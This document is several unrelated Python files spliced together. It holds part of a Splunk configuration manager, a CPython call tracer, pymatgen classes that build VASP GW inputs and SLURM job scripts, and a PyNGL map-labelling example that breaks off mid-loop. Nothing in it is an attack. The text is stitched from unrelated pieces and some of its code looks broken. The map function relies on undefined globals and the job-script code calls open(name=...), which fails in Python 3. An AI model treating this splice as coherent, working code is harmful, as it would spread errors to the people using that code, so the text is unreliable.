def delete_stanzas(self, conf_name, stanzas):
"""
:param stanzas: list of stanzas
:return: list of failed stanzas
"""
failed_stanzas = []
for stanza in stanzas:
try:
self.delete_stanza(conf_name, stanza)
except Exception:
failed_stanzas.append(stanza)
return failed_stanzas
# data input management
def create_data_input(self, input_type, name, key_values=None):
scmdi.create_data_input(self.splunkd_uri, self.session_key,
self.owner, self.app_name,
input_type, name, key_values)
def update_data_input(self, input_type, name, key_values):
scmdi.update_data_input(self.splunkd_uri, self.session_key,
self.owner, self.app_name,
input_type, name, key_values)
def delete_data_input(self, input_type, name):
scmdi.delete_data_input(self.splunkd_uri, self.session_key,
self.owner, self.app_name,
input_type, name)
def get_data_input(self, input_type, name=None, do_reload=False):
if do_reload:
self.reload_data_input(input_type)
return scmdi.get_data_input(self.splunkd_uri, self.session_key,
"-", "-", input_type, name)
def reload_data_input(self, input_type):
scmdi.reload_data_input(self.splunkd_uri, self.session_key,
"-", "-", input_type)
def enable_data_input(self, input_type, name):
scmdi.operate_data_input(self.splunkd_uri, self.session_key,
self.owner, self.app_name,
input_type, name, "enable")
def disable_data_input(self, input_type, name):
scmdi.operate_data_input(self.splunkd_uri, self.session_key,
self.owner, self.app_name,
input_type, name, "disable")
def data_input_exist(self, input_type, name):
try:
result = self.get_data_input(input_type, name)
except req.ConfNotExistsException:
return False
return result is not None
def all_data_input_stanzas(self, input_type, do_reload=False,
ret_metadata=False):
stanzas = self.get_data_input(input_type, do_reload=do_reload)
for stanza in stanzas:
if "eai:acl" in stanza and "app" in stanza["eai:acl"]:
stanza["appName"] = stanza["eai:acl"]["app"]
stanza["userName"] = stanza["eai:acl"].get("owner", "nobody")
return self._delete_metadata(stanzas, ret_metadata)
def get_data_input_stanza(self, input_type, name, do_reload=False,
ret_metadata=False):
stanzas = self.get_data_input(input_type, name, do_reload)
stanzas = self._delete_metadata(stanzas, ret_metadata)
return stanzas[0]
def delete_data_input_stanzas(self, input_type, names):
"""
:param stanzas: list of stanzas
:return: list of failed stanzas
"""
failed_names = []
for name in names:
try:
self.delete_data_input(input_type, name)
except Exception:
failed_names.append(name)
return failed_names
def _delete_metadata(self, stanzas, ret_metadata):
if stanzas and not ret_metadata:
for stanza in stanzas:
                for key in list(stanza.keys()):  # copy keys; we delete while iterating
if key.startswith("eai:"):
del stanza[key]
return stanzas
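# Illustrative usage sketch (not part of the original module). The splunkd URI
# and session key below are hypothetical placeholders; in a real modular input
# they come from Splunk's introspection/authentication payload.
def _example_conf_manager_usage():
    mgr = ConfManager("https://127.0.0.1:8089", "<session_key>",
                      owner="nobody", app_name="my_app")
    if not mgr.stanza_exist("myconf", "mystanza"):
        mgr.create_stanza("myconf", "mystanza", {"interval": "60"})
    stanzas = mgr.all_stanzas_as_dicts("myconf", do_reload=True)
    return stanzas.get("mystanza")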
|
|
import inspect
import gc
import sys
import os.path
import difflib
from trace import modname  # used by file_module_function_of below
from earthdragon.func_util import get_parent
import pandas as pd
def is_property(code):
"""
Using some CPython gc magics, check if a code object is a property
gc idea taken from trace.py from stdlib
"""
# use of gc.get_referrers() was suggested by Michael Hudson
# all functions which refer to this code object
gc.collect()
code_refs = gc.get_referrers(code)
funcs = [f for f in code_refs
if inspect.isfunction(f)]
if len(funcs) != 1:
return False
# property object will reference the original func
props = [p for p in gc.get_referrers(funcs[0])
if isinstance(p, property)]
return len(props) == 1
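# Illustrative sketch (not part of the original module): a getter wrapped in a
# property should be detected via its code object, e.g.
# is_property(_PropertyDemo.value.fget.__code__) is expected to be True, while
# the code object of a plain function is not.
class _PropertyDemo(object):
    @property
    def value(self):
        return 42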
def is_class_dict(dct):
if not isinstance(dct, dict):
return False
if '__dict__' not in dct \
or not inspect.isgetsetdescriptor(dct['__dict__']):
return False
return True
class Follow(object):
"""
Follows execution path.
Meant as a quick way to see what a function does.
In [2]: with Follow() as f:
...: df.sum()
...:
In [3]: f.pprint(depth=2)
stat_func generic.py:3542
_reduce frame.py:3995
_get_axis_number generic.py:285
_get_agg_axis frame.py:4128
as_matrix generic.py:1938
"""
def __init__(self, depth=1, silent=False, parent=False):
self.depth = depth
self.silent = silent
self.timings = []
self.frame_cache = {}
self._caller_cache = {}
self.parent = parent
self.stack_depth_cache = {}
def current_depth(self, frame):
current_depth = None
i = 0
f = frame.f_back
while f:
i += 1
parent_depth = self.stack_depth_cache.get(id(f), None)
if parent_depth is not None:
current_depth = i + parent_depth
break
# if we're already past depth, don't bother finding real depth
if i > self.depth:
return None
f = f.f_back
# should always at least get back to base parent
return current_depth
def trace_dispatch(self, frame, event, arg):
if len(self.stack_depth_cache) == 0:
            # __enter__ is the initial frame
self.stack_depth_cache[id(frame.f_back)] = 0
        # the lower parts get heavy; don't do anything for frames deeper
        # than depth
current_depth = self.current_depth(frame)
if current_depth is None:
return
if current_depth > self.depth:
return
if event not in ['call', 'c_call']:
return
# skip built in funcs
if inspect.isbuiltin(arg):
return
# skip properties, we're only really interested in function calls
        # this will unfortunately skip any important logic that is wrapped
# in property logic
code = frame.f_code
if is_property(code):
return
# note that get_parent is supa slow.
parent_name = None
if self.parent:
parent_name = get_parent(code)
indent, first_parent = self.indent_level(frame)
if event == "c_call":
func_name = arg.__name__
fn = (indent, "", 0, func_name, id(frame), id(first_parent), None)
elif event == 'call':
fcode = frame.f_code
fn = (indent, fcode.co_filename, fcode.co_firstlineno,
fcode.co_name, id(frame), id(first_parent), parent_name)
self.timings.append(fn)
def indent_level(self, frame):
i = 0
f = frame.f_back
first_parent = f
while f:
if id(f) in self.frame_cache:
i += 1
f = f.f_back
if i == 0:
# clear out the frame cache
self.frame_cache = {id(frame): True}
else:
self.frame_cache[id(frame)] = True
return i, first_parent
def to_frame(self):
data = self.timings
cols = ['indent', 'filename', 'lineno', 'func_name', 'frame_id',
'parent_id', 'parent_name']
df = pd.DataFrame(data, columns=cols)
df.loc[:, 'filename'] = df.filename.apply(
lambda s: os.path.basename(s)
)
return df
def __enter__(self):
sys.setprofile(self.trace_dispatch)
return self
def __exit__(self, type, value, traceback):
sys.setprofile(None)
if not self.silent:
self.pprint(self.depth)
def file_module_function_of(self, frame):
code = frame.f_code
filename = code.co_filename
if filename:
modulename = modname(filename)
else:
modulename = None
funcname = code.co_name
clsname = None
if code in self._caller_cache:
if self._caller_cache[code] is not None:
clsname = self._caller_cache[code]
else:
self._caller_cache[code] = None
# use of gc.get_referrers() was suggested by Michael Hudson
# all functions which refer to this code object
funcs = [f for f in gc.get_referrers(code)
if inspect.isfunction(f)]
# require len(func) == 1 to avoid ambiguity caused by calls to
# new.function(): "In the face of ambiguity, refuse the
# temptation to guess."
if len(funcs) == 1:
dicts = [d for d in gc.get_referrers(funcs[0])
if isinstance(d, dict)]
if len(dicts) == 1:
classes = [c for c in gc.get_referrers(dicts[0])
if hasattr(c, "__bases__")]
if len(classes) == 1:
# ditto for new.classobj()
clsname = classes[0].__name__
# cache the result - assumption is that new.* is
# not called later to disturb this relationship
# _caller_cache could be flushed if functions in
# the new module get called.
self._caller_cache[code] = clsname
if clsname is not None:
funcname = "%s.%s" % (clsname, funcname)
return filename, modulename, funcname
def gen_output(self, depth=None):
df = self.to_frame()
mask = df.filename == ''
mask = mask | df.func_name.isin(['<lambda>', '<genexpr>'])
mask = mask | df.func_name.str.startswith('__')
if depth:
mask = mask | (df.indent > depth)
MSG_FORMAT = "{indent}{func_name}{class_name} <{filename}:{lineno}>"
df = df.loc[~mask]
def format(row):
indent = row[0]
filename = row[1]
lineno = row[2]
func_name = row[3]
class_name = row[6] or ''
if class_name:
class_name = '::{class_name}'.format(class_name=class_name)
msg = MSG_FORMAT.format(indent=" "*indent*4, func_name=func_name,
filename=filename, lineno=lineno,
class_name=class_name)
return msg
df = df.reset_index(drop=True)
output = df.apply(format, axis=1, raw=True)
return output.values.tolist()
def pprint(self, depth=None):
output = self.gen_output(depth=depth)
print(("-" * 40))
print(("Follow Path (depth {depth}):".format(depth=depth)))
print(("-" * 40))
print(("\n".join(output)))
def diff(self, right, depth):
left_output = self.gen_output(depth)
right_output = right.gen_output(depth)
return DiffOutput(left_output, right_output)
class DiffOutput:
def __init__(self, left_output, right_output):
self.left_output = left_output
self.right_output = right_output
def __repr__(self):
return '\n'.join(difflib.ndiff(self.left_output, self.right_output))
def _repr_html_(self):
htmldiff = difflib.HtmlDiff()
diff = htmldiff.make_table(self.left_output, self.right_output)
return diff
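# Illustrative usage sketch (not part of the original module): trace two calls
# and diff their execution paths. `df` is assumed to be a pandas DataFrame.
def _example_follow_diff(df):
    with Follow(depth=2, silent=True) as left:
        df.sum()
    with Follow(depth=2, silent=True) as right:
        df.mean()
    left.pprint(depth=2)
    return left.diff(right, depth=2)  # DiffOutput; repr() renders an ndiff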
|
|
# coding: utf-8
from __future__ import division, unicode_literals, print_function
"""
Input sets for VASP GW calculations
Single VASP GW work: creates input and job scripts from the input sets for a specific job
"""
__author__ = "Michiel van Setten"
__copyright__ = " "
__version__ = "0.9"
__maintainer__ = "Michiel van Setten"
__email__ = "mjvansetten@gmail.com"
__date__ = "May 2014"
import os
import json
import os.path
import stat
from pymatgen.io.vaspio.vasp_input import Kpoints, Potcar
from pymatgen.io.vaspio_set import DictVaspInputSet
from pymatgen.io.gwwrapper.helpers import s_name
MODULE_DIR = os.path.dirname(os.path.abspath(__file__))
"""
GWVaspInputSet.json contains the standard settings for GW calculations. This set contains all
parameters for the first self-consistent DFT calculation. The modifications for the subsequent
sub-calculations are made below.
For many settings the number of cores on which the calculations will be run is needed; this
number is assumed to be available in the environment variable NPARGWCALC.
"""
class GWscDFTPrepVaspInputSet(DictVaspInputSet):
"""
Implementation of VaspInputSet overriding MaterialsProjectVaspInputSet
for static calculations preparing for a GW calculation.
"""
TESTS = {}
CONVS = {}
def __init__(self, structure, spec, functional='PBE', sym_prec=0.01, **kwargs):
"""
Supports the same kwargs as :class:`JSONVaspInputSet`.
"""
with open(os.path.join(MODULE_DIR, "GWVaspInputSet.json")) as f:
DictVaspInputSet.__init__(
self, "MP Static Self consistent run for GW", json.load(f), **kwargs)
self.structure = structure
self.tests = self.__class__.get_defaults_tests()
self.convs = self.__class__.get_defaults_convs()
self.functional = functional
self.set_dens(spec)
self.sym_prec = sym_prec
    # todo: update from_dict and to_dict to include the new attributes
@classmethod
def get_defaults_tests(cls):
return cls.TESTS.copy()
@classmethod
def get_defaults_convs(cls):
return cls.CONVS.copy()
def get_npar(self, structure):
"""
        get an 'optimally' useful degree of parallelism (NPAR)
"""
npar = int(self.get_bands(structure) ** 2 * structure.volume / 600)
npar = min(max(npar, 1), 52)
return npar
def set_test(self, test, value):
"""
Method to switch a specific test on
"""
all_tests = GWscDFTPrepVaspInputSet.get_defaults_tests()
all_tests.update(GWDFTDiagVaspInputSet.get_defaults_tests())
all_tests.update(GWG0W0VaspInputSet.get_defaults_tests())
test_type = all_tests[test]['method']
npar = self.get_npar(self.structure)
if test_type == 'incar_settings':
self.incar_settings.update({test: value})
if test_type == 'set_nomega':
nomega = npar * int(value / npar)
self.incar_settings.update({"NOMEGA": int(nomega)})
if test_type == 'set_nbands':
nbands = value * self.get_bands(self.structure)
nbands = npar * int(nbands / npar + 1)
self.incar_settings.update({"NBANDS": int(nbands)})
if test_type == 'kpoint_grid':
pass
def get_potcar(self, structure):
"""
Method for getting LDA potcars
"""
if self.sort_structure:
structure = structure.get_sorted_structure()
return Potcar(self.get_potcar_symbols(structure), functional=self.functional)
def get_kpoints(self, structure):
"""
Writes out a KPOINTS file using the automated gamma grid method.
        VASP crashes GW calculations on non-gamma-centered meshes.
"""
if self.sort_structure:
structure = structure.get_sorted_structure()
dens = int(self.kpoints_settings['grid_density'])
if dens == 1:
return Kpoints.gamma_automatic()
else:
return Kpoints.automatic_gamma_density(structure, dens)
def set_dens(self, spec):
"""
sets the grid_density to the value specified in spec
"""
self.kpoints_settings['grid_density'] = spec['kp_grid_dens']
if spec['kp_grid_dens'] < 100:
self.incar_settings.update({'ISMEAR': 0})
def get_electrons(self, structure):
"""
Method for retrieving the number of valence electrons
"""
valence_list = {}
potcar = self.get_potcar(structure)
for pot_single in potcar:
valence_list.update({pot_single.element: pot_single.nelectrons})
electrons = sum([valence_list[element.symbol] for element in structure.species])
return int(electrons)
def get_bands(self, structure):
"""
Method for retrieving the standard number of bands
"""
bands = self.get_electrons(structure) / 2 + len(structure)
return int(bands)
def set_test_calc(self):
"""
absolute minimal setting for testing
"""
self.incar_settings.update({"PREC": "low", "ENCUT": 250})
self.kpoints_settings['grid_density'] = 1
def set_prec_high(self):
self.incar_settings.update({"PREC": "Accurate", "ENCUT": 400})
class GWDFTDiagVaspInputSet(GWscDFTPrepVaspInputSet):
"""
Implementation of VaspInputSet overriding MaterialsProjectVaspInputSet
for static non self-consistent exact diagonalization step preparing for
a GW calculation.
"""
TESTS = {'NBANDS': {'test_range': (10, 20, 30), 'method': 'set_nbands', 'control': "gap"}}
CONVS = {'NBANDS': {'test_range': (10, 20, 30, 40, 50, 60, 70), 'method': 'set_nbands', 'control': "gap"}}
def __init__(self, structure, spec, functional='PBE', sym_prec=0.01, **kwargs):
"""
Supports the same kwargs as :class:`JSONVaspInputSet`.
"""
with open(os.path.join(MODULE_DIR, "GWVaspInputSet.json")) as f:
DictVaspInputSet.__init__(
self, "MP Static exact diagonalization", json.load(f), **kwargs)
self.structure = structure
self.tests = self.__class__.get_defaults_tests()
self.convs = self.__class__.get_defaults_convs()
self.functional = functional
self.sym_prec = sym_prec
self.set_dens(spec)
npar = self.get_npar(self.structure)
#single step exact diagonalization, output WAVEDER
self.incar_settings.update({"ALGO": "Exact", "NELM": 1, "LOPTICS": "TRUE"})
# for large systems exact diagonalization consumes too much memory
self.set_gw_bands(15)
self.incar_settings.update({"NPAR": npar})
def set_gw_bands(self, factor=15):
"""
method to set the number of bands for GW
"""
gw_bands = self.get_bands(self.structure)
gw_bands = self.get_npar(self.structure) * int((factor * gw_bands) / self.get_npar(self.structure) + 1)
self.incar_settings.update({"NBANDS": gw_bands})
if gw_bands > 800:
self.incar_settings.update({"ALGO": 'fast'})
def set_prec_high(self):
super(GWDFTDiagVaspInputSet, self).set_prec_high()
self.set_gw_bands(30)
class GWG0W0VaspInputSet(GWDFTDiagVaspInputSet):
"""
Should go to Pymatgen vaspinputsets
Implementation of VaspInputSet overriding MaterialsProjectVaspInputSet
for static G0W0 calculation
"""
TESTS = {'ENCUTGW': {'test_range': (200, 300, 400), 'method': 'incar_settings', 'control': "gap"},
'NOMEGA': {'test_range': (80, 100, 120), 'method': 'set_nomega', 'control': "gap"}}
CONVS = {'ENCUTGW': {'test_range': (200, 400, 600, 800), 'method': 'incar_settings', 'control': "gap"}}
def __init__(self, structure, spec, functional='PBE', sym_prec=0.01, **kwargs):
"""
Supports the same kwargs as :class:`JSONVaspInputSet`.
"""
with open(os.path.join(MODULE_DIR, "GWVaspInputSet.json")) as f:
DictVaspInputSet.__init__(
self, "MP Static G0W0", json.load(f), **kwargs)
self.structure = structure
self.tests = self.__class__.get_defaults_tests()
self.convs = self.__class__.get_defaults_convs()
self.functional = functional
self.sym_prec = sym_prec
npar = self.get_npar(structure)
# G0W0 calculation with reduced cutoff for the response function
self.incar_settings.update({"ALGO": "GW0", "ENCUTGW": 250, "LWAVE": "FALSE", "NELM": 1})
self.set_dens(spec)
self.nomega_max = 2 * self.get_kpoints(structure).kpts[0][0]**3
nomega = npar * int(self.nomega_max / npar)
self.set_gw_bands(15)
self.incar_settings.update({"NPAR": npar})
self.incar_settings.update({"NOMEGA": nomega})
self.tests = self.__class__.get_defaults_tests()
def wannier_on(self):
self.incar_settings.update({"LWANNIER90_RUN": ".TRUE."})
self.incar_settings.update({"LWRITE_MMN_AMN": ".TRUE."})
def spectral_off(self):
"""
        Method to switch off the use of the spectral decomposition of the response function.
        This may be used to reduce memory demands if the calculation crashes due to memory shortage.
"""
self.incar_settings.update({"LSPECTRAL": ".False."})
def gw0_on(self, niter=4, gwbandsfac=4, qpsc=False):
"""
Method to switch to gw0 calculation with standard 4 iterations
"""
# set the number of iterations of GW0
self.incar_settings.update({"NELM": niter})
# set the number of bands to update in the iteration of G
npar = self.get_npar(self.structure)
nbandsgw = self.get_bands(self.structure)*gwbandsfac
nbandsgw = npar * int(nbandsgw / npar)
self.incar_settings.update({"NBANDSGW": nbandsgw})
        # if set, also update the orbitals ('quasi-particle self-consistency')
if qpsc:
self.incar_settings.update({"ALGO": "scGW0"})
# todo update tests ....
def set_prec_high(self):
super(GWG0W0VaspInputSet, self).set_prec_high()
self.incar_settings.update({"ENCUTGW": 400, "NOMEGA": int(self.incar_settings["NOMEGA"]*1.5)})
self.incar_settings.update({"PRECFOCK": "accurate"})
class Wannier90InputSet():
"""
class containing the input parameters for the wannier90.win file
"""
def __init__(self, spec):
self.file_name = "wannier90.win"
self.settings = {"bands_plot": "true", "num_wann": 2, "num_bands": 4}
self.parameters = {"n_include_bands": 1}
self.spec = spec
def make_kpoint_path(self, structure, f):
f.write("\nbegin kpoint_path\n")
line = str(structure.vbm_l) + " " + str(structure.vbm[0]) + " " + str(structure.vbm[1]) + " " + str(structure.vbm[2])
line = line + " " + str(structure.cbm_l) + " " + str(structure.cbm[0]) + " " + str(structure.cbm[1]) + " " + str(structure.cbm[2])
f.write(line)
f.write("\nend kpoint_path\n\n")
pass
def make_exclude_bands(self, structure, f):
nocc = GWscDFTPrepVaspInputSet(structure, self.spec).get_electrons(structure) / 2
n1 = str(int(1))
n2 = str(int(nocc - self.parameters["n_include_bands"]))
n3 = str(int(nocc + 1 + self.parameters["n_include_bands"]))
n4 = str(int(GWG0W0VaspInputSet(structure, self.spec).incar_settings["NBANDS"]))
line = "exclude_bands : " + n1 + "-" + n2 + ", " + n3 + "-" + n4 + "\n"
f.write(line)
#todo there is still a bug here...
pass
def write_file(self, structure, path):
f = open(os.path.join(path, self.file_name), mode='w')
f.write("bands_plot = ")
f.write(self.settings["bands_plot"])
f.write("\n")
self.make_kpoint_path(structure, f)
f.write("num_wann = ")
f.write(str(self.settings["num_wann"]))
f.write("\n")
f.write("num_bands = ")
f.write(str(self.settings["num_bands"]))
f.write("\n")
self.make_exclude_bands(structure, f)
f.close()
class SingleVaspGWWork():
"""
    Create VASP input for a single standard G0W0 or GW0 calculation step.
    The combination of job and option specifies what needs to be created.
"""
def __init__(self, structure, job, spec, option=None, converged=False):
self.structure = structure
self.job = job
self.spec = spec
self.option = option
self.converged = converged
def create_input(self):
"""
create vasp input
"""
option_name = ''
path_add = ''
if self.spec['converge'] and self.converged:
path_add = '.conv'
if self.option is None:
path = s_name(self.structure)
else:
path = os.path.join(s_name(self.structure) + path_add,
str(self.option['test_prep'])+str(self.option['value_prep']))
if 'test' in self.option.keys():
option_name = '.'+str(self.option['test'])+str(self.option['value'])
if self.job == 'prep':
inpset = GWscDFTPrepVaspInputSet(self.structure, self.spec, functional=self.spec['functional'])
if self.spec['converge'] and not self.converged:
spec_tmp = self.spec.copy()
spec_tmp.update({'kp_grid_dens': 2})
inpset = GWscDFTPrepVaspInputSet(self.structure, spec_tmp, functional=self.spec['functional'])
inpset.incar_settings.update({"ENCUT": 800})
if self.spec['test'] or self.spec['converge']:
if self.option['test_prep'] in GWscDFTPrepVaspInputSet.get_defaults_convs().keys() or self.option['test_prep'] in GWscDFTPrepVaspInputSet.get_defaults_tests().keys():
inpset.set_test(self.option['test_prep'], self.option['value_prep'])
if self.spec["prec"] == "h":
inpset.set_prec_high()
inpset.write_input(self.structure, path)
inpset = GWDFTDiagVaspInputSet(self.structure, self.spec, functional=self.spec['functional'])
if self.spec["prec"] == "h":
inpset.set_prec_high()
if self.spec['converge'] and not self.converged:
spec_tmp = self.spec.copy()
spec_tmp.update({'kp_grid_dens': 2})
inpset = GWDFTDiagVaspInputSet(self.structure, spec_tmp, functional=self.spec['functional'])
inpset.incar_settings.update({"ENCUT": 800})
if self.spec['test'] or self.spec['converge']:
inpset.set_test(self.option['test_prep'], self.option['value_prep'])
inpset.get_incar(self.structure).write_file(os.path.join(path, 'INCAR.DIAG'))
if self.job == 'G0W0':
inpset = GWG0W0VaspInputSet(self.structure, self.spec, functional=self.spec['functional'])
if self.spec['converge'] and not self.converged:
spec_tmp = self.spec.copy()
spec_tmp.update({'kp_grid_dens': 2})
inpset = GWG0W0VaspInputSet(self.structure, spec_tmp, functional=self.spec['functional'])
inpset.incar_settings.update({"ENCUT": 800})
if self.spec['test'] or self.spec['converge']:
inpset.set_test(self.option['test_prep'], self.option['value_prep'])
inpset.set_test(self.option['test'], self.option['value'])
if self.spec["prec"] == "h":
inpset.set_prec_high()
if self.spec['kp_grid_dens'] > 20:
inpset.wannier_on()
inpset.write_input(self.structure, os.path.join(path, 'G0W0'+option_name))
w_inpset = Wannier90InputSet(self.spec)
w_inpset.write_file(self.structure, os.path.join(path, 'G0W0'+option_name))
else:
inpset.write_input(self.structure, os.path.join(path, 'G0W0'+option_name))
if self.job == 'GW0':
inpset = GWG0W0VaspInputSet(self.structure, self.spec, functional=self.spec['functional'])
if self.spec['converge'] and not self.converged:
spec_tmp = self.spec.copy()
spec_tmp.update({'kp_grid_dens': 2})
inpset = GWG0W0VaspInputSet(self.structure, spec_tmp, functional=self.spec['functional'])
inpset.incar_settings.update({"ENCUT": 800})
if self.spec['test'] or self.spec['converge']:
inpset.set_test(self.option['test_prep'], self.option['value_prep'])
inpset.set_test(self.option['test'], self.option['value'])
if self.spec["prec"] == "h":
inpset.set_prec_high()
inpset.gw0_on()
if self.spec['kp_grid_dens'] > 20:
inpset.wannier_on()
inpset.write_input(self.structure, os.path.join(path, 'GW0'+option_name))
w_inpset = Wannier90InputSet(self.spec)
w_inpset.write_file(self.structure, os.path.join(path, 'GW0'+option_name))
else:
inpset.write_input(self.structure, os.path.join(path, 'GW0'+option_name))
if self.job == 'scGW0':
inpset = GWG0W0VaspInputSet(self.structure, self.spec, functional=self.spec['functional'])
if self.spec['converge'] and not self.converged:
spec_tmp = self.spec.copy()
spec_tmp.update({'kp_grid_dens': 2})
inpset = GWG0W0VaspInputSet(self.structure, spec_tmp, functional=self.spec['functional'])
inpset.incar_settings.update({"ENCUT": 800})
if self.spec['test'] or self.spec['converge']:
inpset.set_test(self.option['test_prep'], self.option['value_prep'])
inpset.set_test(self.option['test'], self.option['value'])
if self.spec["prec"] == "h":
inpset.set_prec_high()
inpset.gw0_on(qpsc=True)
if self.spec['kp_grid_dens'] > 20:
inpset.wannier_on()
inpset.write_input(self.structure, os.path.join(path, 'scGW0'+option_name))
w_inpset = Wannier90InputSet(self.spec)
w_inpset.write_file(self.structure, os.path.join(path, 'scGW0'+option_name))
else:
inpset.write_input(self.structure, os.path.join(path, 'scGW0'+option_name))
def create_job_script(self, add_to_collection=True):
"""
        Create a job script for the Ceci clusters.
"""
npar = GWscDFTPrepVaspInputSet(self.structure, self.spec,
functional=self.spec['functional']).get_npar(self.structure)
if self.option is not None:
option_prep_name = str(self.option['test_prep']) + str(self.option['value_prep'])
if 'test' in self.option.keys():
option_name = str('.') + str(self.option['test']) + str(self.option['value'])
else:
option_prep_name = option_name = ''
# npar = int(os.environ['NPARGWCALC'])
header = ("#!/bin/bash \n"
"## standard header for Ceci clusters ## \n"
"#SBATCH --mail-user=michiel.vansetten@uclouvain.be \n"
"#SBATCH --mail-type=ALL\n"
"#SBATCH --time=2-24:0:0 \n"
"#SBATCH --cpus-per-task=1 \n"
"#SBATCH --mem-per-cpu=4000 \n")
path_add = ''
if self.spec['converge'] and self.converged:
path_add = '.conv'
if self.job == 'prep':
path = os.path.join(s_name(self.structure) + path_add, option_prep_name)
# create this job
job_file = open(name=os.path.join(path, 'job'), mode='w')
job_file.write(header)
job_file.write('#SBATCH --job-name='+s_name(self.structure)+self.job+'\n')
job_file.write('#SBATCH --ntasks='+str(npar)+'\n')
job_file.write('module load vasp \n')
job_file.write('mpirun vasp \n')
job_file.write('cp OUTCAR OUTCAR.sc \n')
job_file.write('cp INCAR.DIAG INCAR \n')
job_file.write('mpirun vasp \n')
job_file.write('cp OUTCAR OUTCAR.diag \n')
job_file.close()
os.chmod(os.path.join(path, 'job'), stat.S_IRWXU)
if add_to_collection:
job_file = open("job_collection", mode='a')
job_file.write('cd ' + path + ' \n')
job_file.write('sbatch job \n')
job_file.write('cd .. \n')
job_file.close()
os.chmod("job_collection", stat.S_IRWXU)
if self.job in ['G0W0', 'GW0', 'scGW0']:
path = os.path.join(s_name(self.structure) + path_add, option_prep_name, self.job + option_name)
# create this job
job_file = open(name=path+'/job', mode='w')
job_file.write(header)
job_file.write('#SBATCH --job-name='+s_name(self.structure)+self.job+'\n')
job_file.write('#SBATCH --ntasks='+str(npar)+'\n')
job_file.write('module load vasp/5.2_par_wannier90 \n')
job_file.write('cp ../CHGCAR ../WAVECAR ../WAVEDER . \n')
job_file.write('mpirun vasp \n')
job_file.write('rm W* \n')
#job_file.write('workon pymatgen-GW; get_gap > gap; deactivate')
#job_file.write('echo '+path+'`get_gap` >> ../../gaps.dat')
job_file.close()
os.chmod(path+'/job', stat.S_IRWXU)
path = os.path.join(s_name(self.structure) + path_add, option_prep_name)
            # append submission of this job script to the prep job script for this structure
if add_to_collection:
job_file = open(name=os.path.join(path, 'job'), mode='a')
job_file.write('cd ' + self.job + option_name + ' \n')
job_file.write('sbatch job \n')
job_file.write('cd .. \n')
job_file.close()
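# Illustrative usage sketch (not part of the original module), assuming
# `structure` is a pymatgen Structure and `spec` carries the keys used above
# ('functional', 'kp_grid_dens', 'converge', 'test', 'prec'). The values are
# hypothetical; the real spec comes from the GW wrapper driver.
def _example_single_gw_work(structure):
    spec = {'functional': 'PBE', 'kp_grid_dens': 500,
            'converge': False, 'test': False, 'prec': 'm'}
    work = SingleVaspGWWork(structure, job='prep', spec=spec)
    work.create_input()       # writes the sc-DFT input set plus INCAR.DIAG
    work.create_job_script()  # writes the SLURM 'job' script and job_collection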
|
|
#
# File:
# mptick_10.py
#
# Synopsis:
# Demonstrates how to mask Lambert Conformal Projection map.
# Shows how to add your own longitude/latitude labels to a
# masked Lambert Conformal plot.
#
# Categories:
# map plot
#
# Based on NCL example:
# mptick_10.ncl
#
# Author:
# Karin Meier-Fleischer
#
# Date of initial publication:
# November 2018
#
# Description:
# This example shows how to create a map.
#
# Effects illustrated:
# o Adding longitude/latitude labels to a masked Lambert Conformal map
# o Moving the main title up
# o Attaching text strings to the outside of a plot
# o Converting lat/lon values to NDC values
# o Changing the angle of text strings
# o Adding a carriage return to a text string using a function code
#
# Output:
# Two visualizations are produced.
#
'''
PyNGL Example: mptick_10.py
- Adding longitude/latitude labels to a masked Lambert Conformal map
- Moving the main title up
- Attaching text strings to the outside of a plot
- Converting lat/lon values to NDC values
- Changing the angle of text strings
- Adding a carriage return to a text string using a function code
'''
from __future__ import print_function
import numpy as np
import Ngl
#-------------------------------------------------------
# Function to attach lat/lon labels to a masked Lambert Conformal plot
#-------------------------------------------------------
def add_labels_lcm(wks,map,dlat,dlon):
PI = 3.14159
RAD_TO_DEG = 180./PI
#-- determine whether we are in northern or southern hemisphere
if (float(minlat) >= 0. and float(maxlat) > 0.):
HEMISPHERE = "NH"
else:
HEMISPHERE = "SH"
#-- pick some "nice" values for the latitude labels.
lat_values = np.arange(int(minlat),int(maxlat),10)
lat_values = lat_values.astype(float)
nlat = len(lat_values)
#-- We need to get the slope of the left and right min/max longitude lines.
#-- Use NDC coordinates to do this.
lat1_ndc = 0.
lon1_ndc = 0.
lat2_ndc = 0.
lon2_ndc = 0.
lon1_ndc,lat1_ndc = Ngl.datatondc(map,minlon,lat_values[0])
lon2_ndc,lat2_ndc = Ngl.datatondc(map,minlon,lat_values[nlat-1])
slope_lft = (lat2_ndc-lat1_ndc)/(lon2_ndc-lon1_ndc)
lon1_ndc,lat1_ndc = Ngl.datatondc(map,maxlon,lat_values[0])
lon2_ndc,lat2_ndc = Ngl.datatondc(map,maxlon,lat_values[nlat-1])
slope_rgt = (lat2_ndc-lat1_ndc)/(lon2_ndc-lon1_ndc)
#-- set some text resources
txres = Ngl.Resources()
txres.txFontHeightF = 0.01
txres.txPosXF = 0.1
#-- Loop through lat values, and attach labels to the left and right edges of
#-- the masked LC plot. The labels will be rotated to fit the line better.
dum_lft = [] #-- assign arrays
dum_rgt = [] #-- assign arrays
lat_label_lft = [] #-- assign arrays
lat_label_rgt = [] #-- assign arrays
for n in range(0,nlat):
#-- left label
if(HEMISPHERE == "NH"):
rotate_val = -90.
direction = "N"
else:
rotate_val = 90.
direction = "S"
#-- add extra white space to labels
lat_label_lft.append("{}~S~o~N~{} ".format(str(np.abs(lat_values[n])),direction))
lat_label_rgt.append(" {}~S~o~N~{}".format(str(np.abs(lat_values[n])),direction))
txres.txAngleF = RAD_TO_DEG * np.arctan(slope_lft) + rotate_val
dum_lft.append(Ngl.add_text(wks,map,lat_label_lft[n],minlon,lat_values[n],txres))
#-- right label
if(HEMISPHERE == "NH"):
rotate_val = 90
else:
rotate_val = -90
txres.txAngleF = RAD_TO_DEG * np.arctan(slope_rgt) + rotate_val
dum_rgt.append(Ngl.add_text(wks,map,lat_label_rgt[n],maxlon,lat_values[n],txres))
#----------------------------------------------------------------------
# Now do longitude labels. These are harder because we're not adding
# them to a straight line.
# Loop through lon values, and attach labels to the bottom edge for
# northern hemisphere, or top edge for southern hemisphere.
#----------------------------------------------------------------------
del(txres.txPosXF)
txres.txPosYF = -5.0
#-- pick some "nice" values for the longitude labels
lon_values = np.arange(int(minlon+10),int(maxlon-10),10).astype(float)
lon_values = np.where(lon_values > 180, 360-lon_values, lon_values)
nlon = lon_values.size
dum_bot = [] #-- assign arrays
lon_labels = [] #-- assign arrays
if(HEMISPHERE == "NH"):
lat_val = minlat
else:
lat_val = maxlat
ctrl = "~C~"
for n in range(0,nlon):
